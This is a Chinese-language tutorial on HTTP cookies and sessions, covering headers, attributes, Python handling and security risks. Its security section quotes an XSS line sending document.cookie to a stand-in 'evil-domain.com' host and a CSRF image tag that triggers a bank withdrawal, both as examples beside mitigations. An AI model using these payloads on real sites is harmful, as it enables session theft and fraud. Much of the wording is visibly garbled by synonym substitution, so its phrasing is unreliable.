Cookie知识大全

Cookie知识大全

Ngrok:超简单的内网穿透,了解一下?

带人人详细了解下Cookie相关的知识!

一、靠山

HTTP无状态:服务器无法知道两个请求是否来自同一个浏览器,即服务器不知道用户上一次做了什么,每次请求都是完全相互自力。早期互联网只是用于简朴的浏览文档信息、查看黄页、门户网站等等,并没有交互这个说法。然则随着互联网逐步生长,宽带、服务器等硬件设施已经获得很大的提升,互联网允许人们可以做更多的事情,以是交互式Web逐步兴起,而HTTP无状态的特点却严重阻碍其生长!

二、Cookie是什么东东

Cookie是由服务器发给客户端的特殊信息,而这些信息以文本文件的方式存放在客户端,然后客户端每次向服务器发送请求的时刻都市带上这些特殊的信息,用于服务器纪录客户端的状态。

Cookie主要用于以下三个方面:

  1. 会话状态治理(如用户登录状态、购物车、游戏分数或其它需要纪录的信息)
  2. 个性化设置(如用户自定义设置、主题等)
  3. 浏览器行为跟踪(如跟踪剖析用户行为等)

三、Cookie原理

在了解了Cookie是由服务器发出存储在浏览器的特殊信息,那详细是怎么样的一个历程呢?为人人为人人画了一幅Cookie原理图。

Cookie知识大全

 
 
 

用户在输入用户名和密码之后,浏览器将用户名和密码发送给服务器,服务器举行验证,验证通过之后将用户信息加密后封装成Cookie放在请求头中返回给浏览器。

HTTP/1.1 200 OK

Content-type: text/html

Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly

浏览器收到服务器返回数据,发现请求头中有一个:Set-Cookie,然后它就把这个Cookie保留起来,下次浏览器再请求服务器的时刻,会把Cookie也放在请求头中传给服务器:

GET /sample_page.html HTTP/1.1

Host: www.example.org

Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

服务器收到请求后从请求头中拿到cookie,然后剖析并到用户信息,说明此用户已登录,Cookie是将数据保留在客户端的。用户信息是保留在Cookie中,也就相当于是保留在浏览器中,那就说用户可以随意修改用户信息,是一种不平安的计谋!强调一点:Cookie无论是服务器发给浏览器照样浏览器发给服务器,都是放在请求头中的!

四、Cookie属性

一个Cookie有:Name、Value、Domain、Path、Expires/Max-Age、Size、HTTP、Secure这些属性,那这些属性划分都有什么作用呢?

1、Name&Value

Name示意Cookie的名称,服务器就是通过name属性来获取某个Cookie值。Value示意Cookie 的值,大多数情况下服务器会把这个value看成一个key去缓存中查询保留的数据。

2、Domain&Path

Domain示意可以接见此cookie的域名,以百度贴吧Cookie来解说一下Domain属性。

Cookie知识大全

 
 
 

从上图中我们可以看出domain有:.baidu.com 顶级域名和.teiba.baidu.com的二级域名,以是这里就会有一个接见规则:顶级域名只能设置或接见顶级域名的Cookie,二级及以下的域名只能接见或设置自身或者顶级域名的Cookie,以是若是要在多个二级域名中共享Cookie的话,只能将Domain属性设置为顶级域名!

3、Expires/Max-Age

Expires/Max-Age示意此cookie超时时间。若设置其值为一个时间,那么当到达此时间后,此cookie失效。不设置的话默认值是Session,意思是cookie会和session一起失效。当浏览器关闭(不是浏览器标签页,而是整个浏览器) 后,此cookie失效,Cookie的过时时间被设准时,设定的日期和时间只与客户端相关,而不是服务端。

这些网络故障的处理手段,能让你快速解决问题

4、Size

Size示意Cookie的name+value的字符数,好比有一个Cookie:id=666,那么Size=2+3=5 。

另外每个浏览器对Cookie的支持都不相同

Cookie知识大全

 
 
 

5、HTTP

HTTP示意cookie的httponly属性。若此属性为true,则只有在http请求头中会带有此cookie的信息,而不能通过document.cookie来接见此cookie。

6、Secure

Secure示意是否只能通过https来通报此条cookie。不像其它选项,该选项只是一个符号而且没有其它的值。这种cookie的内容意指具有很高的价值而且可能潜在的被破解以纯文本形式传输。

五、操作Cookie

1、天生Cookie

Cookie是由服务端天生的,那若何用Python代码来天生呢?

Cookie知识大全

 
 
 

从登录代码中我们看到,在简朴的验证用户名和密码之后,服务器跳转到/user,然后set了一个cookie,浏览器收到响应后发现请求头中有一个:Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg,然后浏览器就会将这个Cookie保留起来!

2、获取Cookie

用requests模块来获取Cookie。

Cookie知识大全

 
 
 

r.cookies示意获取所有cookie,get_dict()函数示意返回的是字典花样cookie。

3、设置Cookie

用浏览器复制过来的Cookie放在代码中,这样便可以顺遂的伪装成浏览器,然后正常爬取数据,复制Cookie是爬虫中常用的一种手段!

Cookie知识大全

 
 
 

六、Session

1、靠山

其实在Cookie设计之初Cookie只保留一个key,而是直接保留用户信息,刚开始人人以为这样用起来很爽,然则由于cookie 是存在用户端,而且它本身存储的尺寸巨细也有限,最关键是用户可以是可见的,并可以随意的修改,很不平安。那若何又要平安,又可以利便的全局读取信息呢?于是,这个时刻,一种新的存储会话机制:Session 诞生了。

2、Session是什么

Session翻译为会话,服务器为每个浏览器确立的一个会话工具,浏览器在第一次请求服务器,服务器便会为这个浏览器天生一个Session工具,保留在服务端,而且把Session的Id以cookie的形式发送给客户端浏览,而以用户显式竣事或session超时为竣事。

Session事情原理:

  • 当一个用户向服务器发送第一个请求时,服务器为其确立一个session,并为此session确立一个标识号(sessionID)。
  • 这个用户随后的所有请求都应包罗这个标识号(sessionID)。服务器会校对这个标识号以判断请求属于哪个session。

对于session标识号(sessionID),有两种方式实现:Cookie和URL重写,Session原理图。

Cookie知识大全

 
 
 

Cookie是将数据直接保留在客户端,而Session是将数据保留在服务端,就平安性来讲Session更好!

七、总结

1、Cookie和Session关系

  • Cookie是保留在客户端,瑕玷易伪造、不平安
  • Session是保留在服务端,会消耗服务器资源
  • Session实现有两种方式:Cookie和URL重写

2、Cookie带来的平安性问题

  • 会话挟制和XSS:在Web应用中,Cookie常用来符号用户或授权会话。因此,若是Web应用的Cookie被窃取,可能导致授权用户的会话受到攻击。常用的窃取Cookie的方式有行使社会工程学攻击和行使应用程序破绽举行XSS攻击。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly类型的Cookie由于阻止了JAVAScript对其的接见性而能在一定程度上缓解此类攻击。
  • 跨站请求伪造(CSRF):好比在不平安聊天室或论坛上的一张图片,它实际上是一个给你银行服务器发送提现的请求:<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">当你打开含有了这张图片的HTML页面时,若是你之前已经登录了你的银行帐号而且Cookie仍然有用(还没有其它验证步骤),你银行里的钱很可能会被自动转走。解决CSRF的设施有:隐藏域验证码、确认机制、较短的Cookie生命周期等。

H3C配置经典全面教程

分享到 :
相关推荐

发表评论

登录... 后才能评论